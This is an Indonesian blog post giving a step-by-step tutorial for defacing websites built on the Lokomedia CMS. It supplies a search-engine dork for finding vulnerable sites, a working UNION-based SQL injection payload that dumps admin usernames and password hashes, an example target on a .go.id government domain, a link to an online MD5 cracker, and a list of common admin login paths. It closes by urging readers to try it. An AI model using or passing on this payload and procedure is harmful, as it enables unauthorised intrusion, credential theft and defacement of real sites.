Minggu, 03 Juli 2016

Tutorial Deface Dengan SQLI Lokomedia Vulnerable




^_^ Assalamualaikum ^_^

   Maaf Baru Ngepost lagi , Jaringan lelet + udah bosan ngeblog lagi -_- .

Mumpung jringan cepet sekarang saya akan bagikan kepada agan" "Tutorial Deface Dengan SQLI Lokomedia Vulnerable" .

Klau Begitu langsung saja baca yuk . Cekidot :D

Dork : inurl:statis-1-profil.html (kembangin lgi biar dapat bnyak)

exploit vuln : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+

Langsung sja gunakan dork diatas menggunakan search engine (google.com) .

Klau sudah dapat Targetnya contoh kyak gini nih Mas Mbah .

www.site.go.id/statis-1-profil.html

Langsung saja masukkan exploit diatas

www.site.go.id/statis-1'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+-profil.html

Nanti username dan password adminnya keliatan tuh di title webnya .

kyak gini .




Kan disitu tdk keliatan jelas passnya klau mau liat fullnya tambahkan "view-source:" Contoh kek gini.


Tuh kan Udah keliata user dan pass adminnya^_^

Tapi passwordnya msih berbentuk md5 -_- terpaksa hrus di hash dulu mas mbah ^_^

Link hash md5 : https://hashkiller.co.uk/md5-decrypter.aspx

Sisa cari saja sendiri halaman loginnya , contoh :

www.site.go.id/adminweb | www.site.go.id/administrator | www.site.go.id/admin | www.site.go.id/redaktur

Ok gitu aja basa basinya om :D

Langsung aja di praktekin :v . Jangan lupa tetap coli di rumah :V

Thanks To : Sec7or Team | Bang Andra | PhantomGhost Team | Sulawesi IT Sec